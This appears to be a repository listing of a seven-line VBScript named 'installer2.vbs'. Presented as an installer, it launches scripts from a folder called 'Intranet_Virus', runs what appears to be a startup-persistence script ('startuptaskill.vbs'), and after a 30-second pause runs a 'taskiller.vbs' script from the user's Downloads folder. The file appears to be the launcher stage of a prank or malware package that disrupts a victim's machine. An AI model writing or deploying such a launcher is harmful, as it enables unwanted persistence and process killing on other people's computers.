intranet/installer2.vbs
2017-03-05 13:52:26 +01:00

7 lines
391 B
Text
Executable file

Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run """Intranet_Virus\installer_msg.vbs"""
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run """%userprofile%\Downloads\Intranet\Startup Creator\startuptaskill.vbs"""
WScript.Sleep 30000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run """%userprofile%\Downloads\Intranet\taskiller.vbs"""